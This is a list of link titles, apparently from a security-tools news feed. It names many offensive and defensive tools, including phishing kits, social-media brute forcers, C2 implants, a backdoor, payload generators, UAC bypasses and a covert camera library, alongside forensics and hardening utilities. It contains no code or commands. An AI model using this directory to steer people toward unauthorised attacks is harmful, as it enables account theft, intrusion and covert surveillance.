- [AutoRDPwn v5.0 - The Shadow Attack Framework](http://feedproxy.google.com/~r/PentestTools/~3/zJ75MJYF2V8/autordpwn-v50-shadow-attack-framework.html)
- [PoshC2 - C2 Server and Implants](http://feedproxy.google.com/~r/PentestTools/~3/cYFi81W7lAw/poshc2-c2-server-and-implants.html)
- [Hacktronian - All In One Hacking Tool For Linux & Android](http://feedproxy.google.com/~r/PentestTools/~3/yV_fdYg2NkU/hacktronian-all-in-one-hacking-tool-for.html)
- [Pyshark - Python Wrapper For Tshark, Allowing Python Packet Parsing Using Wireshark Dissectors](http://feedproxy.google.com/~r/PentestTools/~3/eTNAbeSDlQw/pyshark-python-wrapper-for-tshark.html)
- [Applepie - A Hypervisor For Fuzzing Built With WHVP And Bochs](http://feedproxy.google.com/~r/PentestTools/~3/U7xXM25iB_M/applepie-hypervisor-for-fuzzing-built.html)
- [PEpper - An Open Source Script To Perform Malware Static Analysis On Portable Executable](http://feedproxy.google.com/~r/PentestTools/~3/5c9MkEcVlaI/pepper-open-source-script-to-perform.html)
- [goDoH - A DNS-over-HTTPS C2](http://feedproxy.google.com/~r/PentestTools/~3/iJDgigWpX6A/godoh-dns-over-https-c2.html)
- [Truegaze - Static Analysis Tool For Android/iOS Apps Focusing On Security Issues Outside The Source Code](http://feedproxy.google.com/~r/PentestTools/~3/UP7CEeZKDqo/truegaze-static-analysis-tool-for.html)
- [pwnedOrNot v1.2.6 - OSINT Tool to Find Passwords for Compromised Email Addresses](http://feedproxy.google.com/~r/PentestTools/~3/SxvMbSv8GrY/pwnedornot-v126-osint-tool-to-find.html)
- ["Can I Take Over XYZ?" - A List Of Services And How To Claim (Sub)Domains With Dangling DNS Records](http://feedproxy.google.com/~r/PentestTools/~3/lPLIPkoIJeg/can-i-take-over-xyz-list-of-services.html)
- [Eyeballer - Convolutional Neural Network For Analyzing Pentest Screenshots](http://feedproxy.google.com/~r/PentestTools/~3/gVjosPt4DJc/eyeballer-convolutional-neural-network.html)
- ["Can I Take Over XYZ?" - A List Of Services And How To Claim (Sub)Domains With Dangling DNS Records.](http://feedproxy.google.com/~r/PentestTools/~3/lPLIPkoIJeg/can-i-take-over-xyz-list-of-services.html)
- [Dow Jones Hammer - Protect The Cloud With The Power Of The cloud(AWS)](http://feedproxy.google.com/~r/PentestTools/~3/e2XileK9-L8/dow-jones-hammer-protect-cloud-with.html)
- [Firmware Slap - Discovering Vulnerabilities In Firmware Through Concolic Analysis And Function Clustering](http://feedproxy.google.com/~r/PentestTools/~3/ZlHsrIesqEo/firmware-slap-discovering.html)
- [Iris - WinDbg Extension To Perform Basic Detection Of Common Windows Exploit Mitigations](http://feedproxy.google.com/~r/PentestTools/~3/ddVv17Euevs/iris-windbg-extension-to-perform-basic.html)
- [Diaphora - The Most Advanced Free And Open Source Program Diffing Tool](http://feedproxy.google.com/~r/PentestTools/~3/5zfOooxp39w/diaphora-most-advanced-free-and-open.html)
- [Airflowscan - Checklist And Tools For Increasing Security Of Apache Airflow](http://feedproxy.google.com/~r/PentestTools/~3/9rsGerchFug/airflowscan-checklist-and-tools-for.html)
- [DockerSecurityPlayground - A Microservices-based Framework For The Study Of Network Security And Penetration Test Techniques](http://feedproxy.google.com/~r/PentestTools/~3/SB-rKad-N3A/dockersecurityplayground-microservices.html)
- [DrMITM - Program Designed To Globally Log All Traffic Of A Website](http://feedproxy.google.com/~r/PentestTools/~3/7Oc-ng3zo7A/drmitm-program-designed-to-globally-log.html)
- [Sampler - A Tool For Shell Commands Execution, Visualization And Alerting (Configured With A Simple YAML File)](http://feedproxy.google.com/~r/PentestTools/~3/NJ1bUhTLgaE/sampler-tool-for-shell-commands.html)
- [Findomain v0.2.1 - The Fastest And Cross-Platform Subdomain Enumerator](http://feedproxy.google.com/~r/PentestTools/~3/769TW1TSpjw/findomain-v021-fastest-and-cross.html)
- [Goop - Google Search Scraper (Bypass CAPTCHA)](http://feedproxy.google.com/~r/PentestTools/~3/_q1nxXQczP4/goop-google-search-scraper-bypass.html)
- [ThreatHunting - A Splunk App Mapped To MITRE ATT&CK To Guide Your Threat Hunts](http://feedproxy.google.com/~r/PentestTools/~3/HUEVPwgh5aA/threathunting-splunk-app-mapped-to.html)
- [HackerTarget ToolKit v2.0 - Tools And Network Intelligence To Help Organizations With Attack Surface Discovery](http://feedproxy.google.com/~r/PentestTools/~3/p7tD_g2ZmJY/hackertarget-toolkit-v20-tools-and.html)
- [Seccomp Tools - Provide Powerful Tools For Seccomp Analysis](http://feedproxy.google.com/~r/PentestTools/~3/m-Wcp9n4Irg/seccomp-tools-provide-powerful-tools.html)
- [AbsoluteZero - Python APT Backdoor](http://feedproxy.google.com/~r/PentestTools/~3/4A8E633X560/absolutezero-python-apt-backdoor.html)
- [Osmedeus v1.5 - Fully Automated Offensive Security Framework For Reconnaissance And Vulnerability Scanning](http://feedproxy.google.com/~r/PentestTools/~3/n9aA6bMDWQI/osmedeus-v15-fully-automated-offensive.html)
- [WAES - Auto Enums Websites And Dumps Files As Result](http://feedproxy.google.com/~r/PentestTools/~3/lznYl-dDkGU/waes-auto-enums-websites-and-dumps.html)
- [BADministration - Tool Which Interfaces with Management or Administration Applications from an Offensive Standpoint](http://feedproxy.google.com/~r/PentestTools/~3/zZlZyR77e50/badministration-tool-which-interfaces.html)
- [SQLMap v1.3.8 - Automatic SQL Injection And Database Takeover Tool](http://feedproxy.google.com/~r/PentestTools/~3/tXw2LTJ-djQ/sqlmap-v138-automatic-sql-injection-and.html)
- [Commando VM v2.0 - The First Full Windows-based Penetration Testing Virtual Machine Distribution](http://feedproxy.google.com/~r/PentestTools/~3/qfDDkq3fmTU/commando-vm-v20-first-full-windows.html)
- [Skadi - Collect, Process, And Hunt With Host Based Data From MacOS, Windows, And Linux](http://feedproxy.google.com/~r/PentestTools/~3/ASo4pP2sP6k/skadi-collect-process-and-hunt-with.html)
- [KRF - A Kernelspace Randomized Faulter](http://feedproxy.google.com/~r/PentestTools/~3/t-YyBOLcysA/krf-kernelspace-randomized-faulter.html)
- [SET v8.0.1 - The Social-Engineer Toolkit](http://feedproxy.google.com/~r/PentestTools/~3/w4tiBuIcrYw/set-v801-social-engineer-toolkit.html)
- [Project iKy v2.1.0 - Tool That Collects Information From An Email And Shows Results In A Nice Visual Interface](http://feedproxy.google.com/~r/PentestTools/~3/4hKlInqj0IM/project-iky-v210-tool-that-collects.html)
- [Project iKy v2.1.0 - Tool That Collects Information From An Email And Shows Results In A Nice Visual Interface](http://feedproxy.google.com/~r/PentestTools/~3/4hKlInqj0IM/project-iky-v210-tool-that-collects.html)
- [Theo - Ethereum Recon And Exploitation Tool](http://feedproxy.google.com/~r/PentestTools/~3/MwZooLpZtBA/theo-ethereum-recon-and-exploitation.html)
- [Malcolm - A Powerful, Easily Deployable Network Traffic Analysis Tool Suite For Full Packet Capture Artifacts (PCAP Files) And Zeek Logs](http://feedproxy.google.com/~r/PentestTools/~3/eUbPxwEjhx8/malcolm-powerful-easily-deployable.html)
- [AutoRecon - Multi-Threaded Network Reconnaissance Tool Which Performs Automated Enumeration Of Services](http://feedproxy.google.com/~r/PentestTools/~3/OqnXDaJLqUc/autorecon-multi-threaded-network.html)
- [WiFiBroot - A WiFi Pentest Cracking Tool For WPA/WPA2 (Handshake, PMKID, Cracking, EAPOL, Deauthentication)](http://feedproxy.google.com/~r/PentestTools/~3/FX1exMAKSSk/wifibroot-wifi-pentest-cracking-tool.html)
- [HELK - The Hunting ELK](http://feedproxy.google.com/~r/PentestTools/~3/ZLYzopsUg1Q/helk-hunting-elk.html)
- [MemGuard - Secure Software Enclave For Storage Of Sensitive Information In Memory](http://feedproxy.google.com/~r/PentestTools/~3/YAq7BcxqcwQ/memguard-secure-software-enclave-for.html)
- [Usbrip - Simple Command Line Forensics Tool For Tracking USB Device Artifacts (History Of USB Events) On GNU/Linux](http://feedproxy.google.com/~r/PentestTools/~3/kreZO6BHsfE/usbrip-simple-command-line-forensics.html)
- [MSNM-S - Multivariate Statistical Network Monitoring-Sensor](http://feedproxy.google.com/~r/PentestTools/~3/8jr1oiWi1hw/msnm-s-multivariate-statistical-network.html)
- [W13Scan - Passive Security Scanner](http://feedproxy.google.com/~r/PentestTools/~3/ChH63pCUMoU/w13scan-passive-security-scanner.html)
- [XSpear - Powerfull XSS Scanning And Parameter Analysis Tool](http://feedproxy.google.com/~r/PentestTools/~3/1eiuhzEnVo4/xspear-powerfull-xss-scanning-and.html)
- [Slurp - S3 Bucket Enumerator](http://feedproxy.google.com/~r/PentestTools/~3/s1pFb3wEBBA/slurp-s3-bucket-enumerator.html)
- [Buster - Find Emails Of A Person And Return Info Associated With Them](http://feedproxy.google.com/~r/PentestTools/~3/y2mAo4j8218/buster-find-emails-of-person-and-return.html)
- [Xssizer - The Best Tool To Find And Prove XSS Flaws](http://feedproxy.google.com/~r/PentestTools/~3/LmLCMU0hGVQ/xssizer-best-tool-to-find-and-prove-xss.html)
- [WDExtract - Extract Windows Defender Database From Vdm Files And Unpack It](http://feedproxy.google.com/~r/PentestTools/~3/fRE010IajtQ/wdextract-extract-windows-defender.html)
- [WeebDNS - DNS Enumeration With Asynchronicity](http://feedproxy.google.com/~r/PentestTools/~3/aj8iNTv76KM/weebdns-dns-enumeration-with.html)
- [RedGhost v3.0 - Linux Post Exploitation Framework Written In Bash Designed To Assist Red Teams In Persistence, Reconnaissance, Privilege Escalation And Leaving No Trace](http://feedproxy.google.com/~r/PentestTools/~3/r5pc37rjXcE/redghost-v30-linux-post-exploitation.html)
- [Recon-ng v5.0.0 - Open Source Intelligence Gathering Tool Aimed At Reducing The Time Spent Harvesting Information From Open Sources](http://feedproxy.google.com/~r/PentestTools/~3/aJ03REwtdTs/recon-ng-v500-open-source-intelligence.html)
- [Uncompyle6 - A Cross-Version Python Bytecode Decompiler](http://feedproxy.google.com/~r/PentestTools/~3/4BqkUdipfRA/uncompyle6-cross-version-python.html)
- [OSXCollector - A Forensic Evidence Collection & Analysis Toolkit For OS X](http://feedproxy.google.com/~r/PentestTools/~3/iIrDdkpfB3I/osxcollector-forensic-evidence.html)
- [Vulnado - Purposely Vulnerable Java Application To Help Lead Secure Coding Workshops](http://feedproxy.google.com/~r/PentestTools/~3/3GWRhgE0P_Y/vulnado-purposely-vulnerable-java.html)
- [Orbit v2.0 - Blockchain Transactions Investigation Tool](http://feedproxy.google.com/~r/PentestTools/~3/wMLiz7Gx-5I/orbit-v20-blockchain-transactions.html)
- [Cloudcheck - Checks Using A Test String If A Cloudflare DNS Bypass Is Possible Using CloudFail](http://feedproxy.google.com/~r/PentestTools/~3/DUH7fx0yK74/cloudcheck-checks-using-test-string-if.html)
- [grapheneX - Automated System Hardening Framework](http://feedproxy.google.com/~r/PentestTools/~3/1c8Pd15Q3f0/graphenex-automated-system-hardening.html)
- [O365-Attack-Toolkit - A Toolkit To Attack Office365](http://feedproxy.google.com/~r/PentestTools/~3/5YBArQY7xbI/o365-attack-toolkit-toolkit-to-attack.html)
- [Pyattck - A Python Module To Interact With The Mitre ATT&CK Framework](http://feedproxy.google.com/~r/PentestTools/~3/M1JRpVeqmzc/pyattck-python-module-to-interact-with.html)
- [Evil-Winrm - The Ultimate WinRM Shell For Hacking/Pentesting](http://feedproxy.google.com/~r/PentestTools/~3/vNwEzZybqkk/evil-winrm-ultimate-winrm-shell-for.html)
- [Airopy - Get Clients And Access Points](http://feedproxy.google.com/~r/PentestTools/~3/_2hr62fH7Rc/airopy-get-clients-and-access-points.html)
- [AMIRA - Automated Malware Incident Response & Analysis](http://feedproxy.google.com/~r/PentestTools/~3/n9b89NWONDo/amira-automated-malware-incident.html)
- [VulnWhisperer - Create Actionable Data From Your Vulnerability Scans](http://feedproxy.google.com/~r/PentestTools/~3/F0Myf7GiesM/vulnwhisperer-create-actionable-data.html)
- [Dockernymous - A Script Used To Create A Whonix Like Gateway/Workstation Environment With Docker Containers](http://feedproxy.google.com/~r/PentestTools/~3/WbwiCRF568Y/dockernymous-script-used-to-create.html)
- [HiddenEye - Modern Phishing Tool With Advanced Functionality (Android-Support-Available)](http://feedproxy.google.com/~r/PentestTools/~3/GTRsshv5Lcs/hiddeneye-modern-phishing-tool-with.html)
- [SUDO_KILLER - A Tool To Identify And Exploit Sudo Rules Misconfigurations And Vulnerabilities Within Sudo](http://feedproxy.google.com/~r/PentestTools/~3/grcbPtCQkyg/sudokiller-tool-to-identify-and-exploit.html)
- [Hvazard - Remove Short Passwords & Duplicates, Change Lowercase To Uppercase & Reverse, Combine Wordlists!](http://feedproxy.google.com/~r/PentestTools/~3/V6_EesPs7B0/hvazard-remove-short-passwords.html)
- [GitGot - Semi-automated, Feedback-Driven Tool To Rapidly Search Through Troves Of Public Data On GitHub For Sensitive Secrets](http://feedproxy.google.com/~r/PentestTools/~3/a-tFgzEyrNg/gitgot-semi-automated-feedback-driven.html)
- [Git-Hound - Find Exposed Keys Across GitHub Using Code Search Keywords](http://feedproxy.google.com/~r/PentestTools/~3/-1BlVCAg-tw/git-hound-find-exposed-keys-across.html)
- [Parrot Security 4.7 - Security GNU/Linux Distribution Designed with Cloud Pentesting and IoT Security in Mind](http://feedproxy.google.com/~r/PentestTools/~3/Wi8FqE6jjoM/parrot-security-47-security-gnulinux.html)
- [Kali NetHunter App Store - The New Android Store Dedicated to Free Security Apps](http://feedproxy.google.com/~r/PentestTools/~3/FpkbVd5aohk/kali-nethunter-app-store-new-android.html)
- [Userrecon v1.1.0 - Recognition Usernames In 187 Social Networks](http://feedproxy.google.com/~r/PentestTools/~3/KQY5OR1xgQ0/userrecon-v110-recognition-usernames-in.html)
- [Brute_Force - BruteForce Gmail, Hotmail, Twitter, Facebook & Netflix](http://feedproxy.google.com/~r/PentestTools/~3/Bovu29IujOM/bruteforce-bruteforce-gmail-hotmail.html)
- [Detect It Easy - Program For Determining Types Of Files For Windows, Linux And MacOS](http://feedproxy.google.com/~r/PentestTools/~3/DTt4xwte7KE/detect-it-easy-program-for-determining.html)
- [Shellsum - A Defense Tool - Detect Web Shells In Local Directories Via Md5Sum](http://feedproxy.google.com/~r/PentestTools/~3/e2sVilO2ess/shellsum-defense-tool-detect-web-shells.html)
- [RedGhost v2.0 - Linux Post Exploitation Framework Designed To Assist Red Teams In Gaining Persistence, Reconnaissance And Leaving No Trace](http://feedproxy.google.com/~r/PentestTools/~3/VgaanjAU6kw/redghost-v20-linux-post-exploitation.html)
- [UACME - Defeating Windows User Account Control](http://feedproxy.google.com/~r/PentestTools/~3/SVc2u0HEg4k/uacme-defeating-windows-user-account.html)
- [JShielder v2.4 - Hardening Script For Linux Servers/ Secure LAMP-LEMP Deployer/ CIS Benchmark G](http://feedproxy.google.com/~r/PentestTools/~3/Be1UlUqJu1E/jshielder-v24-hardening-script-for.html)
- [Project iKy v2.0.0 - Tool That Collects Information From An Email And Shows Results In A Nice Visual Interface](http://feedproxy.google.com/~r/PentestTools/~3/1W_lCE0_ys4/project-iky-v200-tool-that-collects.html)
- [Passpie - Multiplatform Command-Line Password Manager](http://feedproxy.google.com/~r/PentestTools/~3/2SEdl8ow5w8/passpie-multiplatform-command-line.html)
- [PasteHunter - Scanning Pastebin With Yara Rules](http://feedproxy.google.com/~r/PentestTools/~3/qShK4eTNtRs/pastehunter-scanning-pastebin-with-yara.html)
- [Pown-Duct - Essential Tool For Finding Blind Injection Attacks](http://feedproxy.google.com/~r/PentestTools/~3/mkfG1rnLQZQ/pown-duct-essential-tool-for-finding.html)
- [Dwarf - Full Featured Multi Arch/Os Debugger Built On Top Of PyQt5 And Frida](http://feedproxy.google.com/~r/PentestTools/~3/oR5kYVz0iVo/dwarf-full-featured-multi-archos.html)
- [Ghostfuscator - The Python Password-Protected Obfuscator Using AES Encryption](http://feedproxy.google.com/~r/PentestTools/~3/pWmfxngNPGI/ghostfuscator-python-password-protected.html)
- [Objection v1.6.6 - Runtime Mobile Exploration](http://feedproxy.google.com/~r/PentestTools/~3/_lHkwuwDics/objection-v166-runtime-mobile.html)
- [Commando VM v1.3 - The First Full Windows-based Penetration Testing Virtual Machine Distribution](http://feedproxy.google.com/~r/PentestTools/~3/QeW-17PeFBU/commando-vm-v13-first-full-windows.html)
- [Findomain - A Cross-Platform Tool That Use Certificate Transparency Logs To Find Subdomains](http://feedproxy.google.com/~r/PentestTools/~3/l3m2ksyqVss/findomain-cross-platform-tool-that-use.html)
- [Echidna - Ethereum Fuzz Testing Framework](http://feedproxy.google.com/~r/PentestTools/~3/LySyfq2ljRM/echidna-ethereum-fuzz-testing-framework.html)
- [Cloud Security Audit - A Command Line Security Audit Tool For Amazon Web Services](http://feedproxy.google.com/~r/PentestTools/~3/tsuJ2vB6UAU/cloud-security-audit-command-line.html)
- [WinObjEx64 - Windows Object Explorer 64-Bit](http://feedproxy.google.com/~r/PentestTools/~3/lhCOJeS8sSE/winobjex64-windows-object-explorer-64.html)
- [Regipy - An OS Independent Python Library For Parsing Offline Registry Hives](http://feedproxy.google.com/~r/PentestTools/~3/lsg0-CwurBg/regipy-os-independent-python-library.html)
- [Rifiuti2 - Windows Recycle Bin Analyser](http://feedproxy.google.com/~r/PentestTools/~3/NtgmgJ2cvWA/rifiuti2-windows-recycle-bin-analyser.html)
- [Linux-Smart-Enumeration - Linux Enumeration Tool For Pentesting And CTFs With Verbosity Levels](http://feedproxy.google.com/~r/PentestTools/~3/c13R99XYWMg/linux-smart-enumeration-linux.html)
- [Whonix v15 - Anonymous Operating System](http://feedproxy.google.com/~r/PentestTools/~3/-KywRX2KNas/whonix-v15-anonymous-operating-system.html)
- [SneakyEXE - Embedding "UAC-Bypassing" Function Into Your Custom Payload](http://feedproxy.google.com/~r/PentestTools/~3/X7fzoY6jRMg/sneakyexe-embedding-uac-bypassing.html)
- [NetSet - Operational Security Utility And Automator](http://feedproxy.google.com/~r/PentestTools/~3/sSGRFqUYMbE/netset-operational-security-utility-and.html)
- [DarkScrape - OSINT Tool For Scraping Dark Websites](http://feedproxy.google.com/~r/PentestTools/~3/S1O9ARRkIBk/darkscrape-osint-tool-for-scraping-dark.html)
- [Youzer - Fake User Generator For Active Directory Environments](http://feedproxy.google.com/~r/PentestTools/~3/QfF2tfS9U1E/youzer-fake-user-generator-for-active.html)
- [Rock-ON - An All In One Recon Tool That Will Just Get A Single Entry Of The Domain Name And Do All Of The Work Alone](http://feedproxy.google.com/~r/PentestTools/~3/3F0JVHl_rug/rock-on-all-in-one-recon-tool-that-will.html)
- [Wesng - Windows Exploit Suggester](http://feedproxy.google.com/~r/PentestTools/~3/S-0NXhKzPf0/wesng-windows-exploit-suggester.html)
- [Fbchecker - Facebook Mass Account Checker](http://feedproxy.google.com/~r/PentestTools/~3/PeOX84N6efU/fbchecker-facebook-mass-account-checker.html)
- [Slackor - A Golang Implant That Uses Slack As A Command And Control Server](http://feedproxy.google.com/~r/PentestTools/~3/SzRtcRYVjzE/slackor-golang-implant-that-uses-slack.html)
- [Hash-Identifier - Software To Identify The Different Types Of Hashes Used To Encrypt Data And Especially Passwords](http://feedproxy.google.com/~r/PentestTools/~3/CPuDEL0K_JI/hash-identifier-software-to-identify.html)
- [MIG - Distributed And Real Time Digital Forensics At The Speed Of The Cloud](http://feedproxy.google.com/~r/PentestTools/~3/VEm_8qyqqCM/mig-distributed-and-real-time-digital.html)
- [Icebox - Virtual Machine Introspection, Tracing & Debugging](http://feedproxy.google.com/~r/PentestTools/~3/fZoFz_cQD9s/icebox-virtual-machine-introspection.html)
- [SQLMap v1.3.7 - Automatic SQL Injection And Database Takeover Tool](http://feedproxy.google.com/~r/PentestTools/~3/D9B7vLLX4C8/sqlmap-v137-automatic-sql-injection-and.html)
- [Sherlock - Find Usernames Across Social Networks](http://feedproxy.google.com/~r/PentestTools/~3/eSJru-TKuEE/sherlock-find-usernames-across-social.html)
- [0xsp-Mongoose - Privilege Escalation Enumeration Toolkit (ELF 64/32), Fast, Intelligent Enumeration With Web API Integration](http://feedproxy.google.com/~r/PentestTools/~3/I5pWurWr6Zw/0xsp-mongoose-privilege-escalation.html)
- [Lst2X64Dbg - Extract labels from IDA .lst or Ghidra .csv file and export x64dbg database](http://feedproxy.google.com/~r/PentestTools/~3/OxAp_RBBjkQ/lst2x64dbg-extract-labels-from-ida-lst.html)
- [Spyse.Py - Python API Wrapper And Command-Line Client For The Tools Hosted On Spyse.Com](http://feedproxy.google.com/~r/PentestTools/~3/U5Ijood5kOA/spysepy-python-api-wrapper-and-command.html)
- [PTF v2.3 - The Penetration Testers Framework Is A Way For Modular Support For Up-To-Date Tools](http://feedproxy.google.com/~r/PentestTools/~3/WmNEm49gvEk/ptf-v23-penetration-testers-framework.html)
- [Scapy - The Python-based Interactive Packet Manipulation Program & Library](http://feedproxy.google.com/~r/PentestTools/~3/ZU-eexqu3f0/scapy-python-based-interactive-packet.html)
- [TwitterShadowBan - Twitter Shadowban Tests](http://feedproxy.google.com/~r/PentestTools/~3/xIWKkM5Hleo/twittershadowban-twitter-shadowban-tests.html)
- [PivotSuite - A Network Pivoting Toolkit](http://feedproxy.google.com/~r/PentestTools/~3/hSWxn6OAoOs/pivotsuite-network-pivoting-toolkit.html)
- [Lynis 2.7.5 - Security Auditing Tool for Unix/Linux Systems](http://feedproxy.google.com/~r/PentestTools/~3/gBCubq1rp1w/lynis-275-security-auditing-tool-for.html)
- [Project iKy - Tool That Collects Information From An Email And Shows Results In A Nice Visual Interface](http://feedproxy.google.com/~r/PentestTools/~3/M4KiPTUKSVo/project-iky-tool-that-collects.html)
- [Getwin - FUD Win32 Payload Generator And Listener](http://feedproxy.google.com/~r/PentestTools/~3/nJnC39lKrHQ/getwin-fud-win32-payload-generator-and.html)
- [Seccubus - Easy Automated Vulnerability Scanning, Reporting And Analysis](http://feedproxy.google.com/~r/PentestTools/~3/V6X3rDBzIjs/seccubus-easy-automated-vulnerability.html)
- [Terminus - A Terminal For A More Modern Age](http://feedproxy.google.com/~r/PentestTools/~3/H3gcYftgMws/terminus-terminal-for-more-modern-age.html)
- [Quarantyne - Modern Web Firewall: Stop Account Takeovers, Weak Passwords, Cloud IPs, DoS Attacks, Disposable Emails](http://feedproxy.google.com/~r/PentestTools/~3/HEnNuHgyhms/quarantyne-modern-web-firewall-stop.html)
- [Prithvi - Report Generation Tool](http://feedproxy.google.com/~r/PentestTools/~3/QN-fodx1gP4/prithvi-report-generation-tool.html)
- [Kippo - SSH Honeypot](http://feedproxy.google.com/~r/PentestTools/~3/E7sOMZsNTbU/kippo-ssh-honeypot.html)
- [Konan - Advanced Web Application Dir Scanner](http://feedproxy.google.com/~r/PentestTools/~3/00MhPW6Sun0/konan-advanced-web-application-dir.html)
- [Seth - Perform A MitM Attack And Extract Clear Text Credentials From RDP Connections](http://feedproxy.google.com/~r/PentestTools/~3/otGqqcWw2mo/seth-perform-mitm-attack-and-extract.html)
- [Rdpscan - A Quick Scanner For The CVE-2019-0708 "BlueKeep" Vulnerability](http://feedproxy.google.com/~r/PentestTools/~3/mCI0mRVoYKo/rdpscan-quick-scanner-for-cve-2019-0708.html)
- [DNSlivery - Easy Files And Payloads Delivery Over DNS](http://feedproxy.google.com/~r/PentestTools/~3/d-u-FwvPkdQ/dnslivery-easy-files-and-payloads.html)
- [GhostSquadHackers - Encrypt/Encode Your Javascript Code](http://feedproxy.google.com/~r/PentestTools/~3/z4tt0Ri7Xag/ghostsquadhackers-encryptencode-your.html)
- [BackBox Linux 6.0 - Ubuntu-based Linux Distribution Penetration Test and Security Assessment](http://feedproxy.google.com/~r/PentestTools/~3/TKLYMNDAekg/backbox-linux-60-ubuntu-based-linux.html)
- [URLextractor - Information Gathering and Website Reconnaissance](http://feedproxy.google.com/~r/PentestTools/~3/yeRbR31P73k/urlextractor-information-gathering-and.html)
- [MozDef - Mozilla Enterprise Defense Platform](http://feedproxy.google.com/~r/PentestTools/~3/rO38ouawMjA/mozdef-mozilla-enterprise-defense.html)
- [Sliver - Implant Framework](http://feedproxy.google.com/~r/PentestTools/~3/_uSxw_sH1Fg/sliver-implant-framework.html)
- [Simplify - Generic Android Deobfuscator](http://feedproxy.google.com/~r/PentestTools/~3/0TKRmeyRmf8/simplify-generic-android-deobfuscator.html)
- [BoomER - Framework For Exploiting Local Vulnerabilities](http://feedproxy.google.com/~r/PentestTools/~3/xNb62x9VIwI/boomer-framework-for-exploiting-local.html)
- [WhatBreach - OSINT Tool To Find Breached Emails And Databases](http://feedproxy.google.com/~r/PentestTools/~3/EI6tCAyZ1-c/whatbreach-osint-tool-to-find-breached.html)
- [BlueGhost - A Network Tool Designed To Assist Blue Teams In Banning Attackers From Linux Servers](http://feedproxy.google.com/~r/PentestTools/~3/pFM6w1Spwtc/blueghost-network-tool-designed-to.html)
- [Vxscan - Comprehensive Scanning Tool](http://feedproxy.google.com/~r/PentestTools/~3/0ZDcFApPJl8/vxscan-comprehensive-scanning-tool.html)
- [RedGhost - Linux Post Exploitation Framework Designed To Gain Persistence And Reconnaissance And Leave No Trace](http://feedproxy.google.com/~r/PentestTools/~3/Gy75mmZWdEY/redghost-linux-post-exploitation.html)
- [One-Lin3r v2.0 - Gives You One-Liners That Aids In Penetration Testing Operations, Privilege Escalation And More](http://feedproxy.google.com/~r/PentestTools/~3/tpDLaHMBIEQ/one-lin3r-v20-gives-you-one-liners-that.html)
- [Tourmaline - Telegram Bot Framework For Crystal](http://feedproxy.google.com/~r/PentestTools/~3/b2eIBVRuc7c/tourmaline-telegram-bot-framework-for.html)
- [VulnX v1.7 - An Intelligent Bot Auto Shell Injector That Detect Vulnerabilities In Multiple Types Of CMS](http://feedproxy.google.com/~r/PentestTools/~3/ABEnXceM1lo/vulnx-v17-intelligent-bot-auto-shell.html)
- [Cryptr - A Simple Shell Utility For Encrypting And Decrypting Files Using OpenSSL](http://feedproxy.google.com/~r/PentestTools/~3/NXXuaKDq9VY/cryptr-simple-shell-utility-for.html)
- [Amass - In-depth DNS Enumeration And Network Mapping](http://feedproxy.google.com/~r/PentestTools/~3/CU7t9RWRUVE/amass-in-depth-dns-enumeration-and.html)
- [Userrecon-Py - Find Usernames In Social Networks](http://feedproxy.google.com/~r/PentestTools/~3/XDi8ASQbqK0/userrecon-py-find-usernames-in-social.html)
- [Metabigor - Command Line Search Engines Without Any API Key](http://feedproxy.google.com/~r/PentestTools/~3/bwTS0tOubeM/metabigor-command-line-search-engines.html)
- [autoPwn - Automate Repetitive Tasks For Fuzzing](http://feedproxy.google.com/~r/PentestTools/~3/LtbIQEba06g/autopwn-automate-repetitive-tasks-for.html)
- [Finshir - A Coroutines-Driven Low And Slow Traffic Sender, Written In Rust](http://feedproxy.google.com/~r/PentestTools/~3/Wj-iLgszhts/finshir-coroutines-driven-low-and-slow.html)
- [Facebash - Facebook Brute Forcer In Shellscript Using TOR](http://feedproxy.google.com/~r/PentestTools/~3/f3cso_9atWo/facebash-facebook-brute-forcer-in.html)
- [Vthunting - A Tiny Script Used To Generate Report About VirusTotal Hunting And Send It By Email, Slack Or Telegram](http://feedproxy.google.com/~r/PentestTools/~3/oKh1run6pi8/vthunting-tiny-script-used-to-generate.html)
- [Python-Iocextract - Advanced Indicator Of Compromise (IOC) Extractor](http://feedproxy.google.com/~r/PentestTools/~3/FJzGewoG5dE/python-iocextract-advanced-indicator-of.html)
- [PcapXray v2.5 - A Network Forensics Tool To Visualize A Packet Capture Offline As A Network Diagram](http://feedproxy.google.com/~r/PentestTools/~3/EbsP_Xce8HA/pcapxray-v25-network-forensics-tool-to.html)
- [ANDRAX v3 - The First And Unique Penetration Testing Platform For Android Smartphones](http://feedproxy.google.com/~r/PentestTools/~3/3jIpU7zeiJg/andrax-v3-first-and-unique-penetration.html)
- [Vulners Scanner for Android - Passive Vulnerability Scanning Based On Software Version Fingerprint](http://feedproxy.google.com/~r/PentestTools/~3/jjXLZCER0Bk/vulners-scanner-for-android-passive.html)
- [ripVT - Virus Total API Maltego Transform Set For Canari](http://feedproxy.google.com/~r/PentestTools/~3/n4rLmMXJVa4/ripvt-virus-total-api-maltego-transform.html)
- [ReverseTCPShell - PowerShell ReverseTCP Shell, Client & Server](http://feedproxy.google.com/~r/PentestTools/~3/pWymKYDrZz8/reversetcpshell-powershell-reversetcp.html)
- [GhostDelivery - This Tool Creates A Obfuscated .vbs Script To Download A Payload Hosted On A Server To %TEMP% Directory, Execute Payload And Gain Persistence](http://feedproxy.google.com/~r/PentestTools/~3/oWV8asKvS20/ghostdelivery-this-tool-creates.html)
- [H8Mail v2.0 - Email OSINT And Password Breach Hunting](http://feedproxy.google.com/~r/PentestTools/~3/d_I-lDRN9Ak/h8mail-v20-email-osint-and-password.html)
- [PhoneSploit v1.2 - Using Open Adb Ports We Can Exploit A Andriod Device](http://feedproxy.google.com/~r/PentestTools/~3/iQzE7P61W8c/phonesploit-v12-using-open-adb-ports-we.html)
- [Zydra - File Password Recovery Tool And Linux Shadow File Cracker](http://feedproxy.google.com/~r/PentestTools/~3/6ATnAnKScCs/zydra-file-password-recovery-tool-and.html)
- [Recsech - Tool For Doing Footprinting And Reconnaissance On The Target Web](http://feedproxy.google.com/~r/PentestTools/~3/fA2yZMgyywc/recsech-tool-for-doing-footprinting-and.html)
- [LiveHiddenCamera - Library Which Record Live Video And Audio From Android Device Without Displaying A Preview](http://feedproxy.google.com/~r/PentestTools/~3/F4Bo_N9vCsw/livehiddencamera-library-which-record.html)
- [Shellphish - Phishing Tool For 18 Social Media (Instagram, Facebook, Snapchat, Github, Twitter...)](http://feedproxy.google.com/~r/PentestTools/~3/5hBi829B8IU/shellphish-phishing-tool-for-18-social.html)
- [TOR Router - A Tool That Allow You To Make TOR Your Default Gateway And Send All Internet Connections Under TOR](http://feedproxy.google.com/~r/PentestTools/~3/gvVN-pwmU4Y/tor-router-tool-that-allow-you-to-make.html)
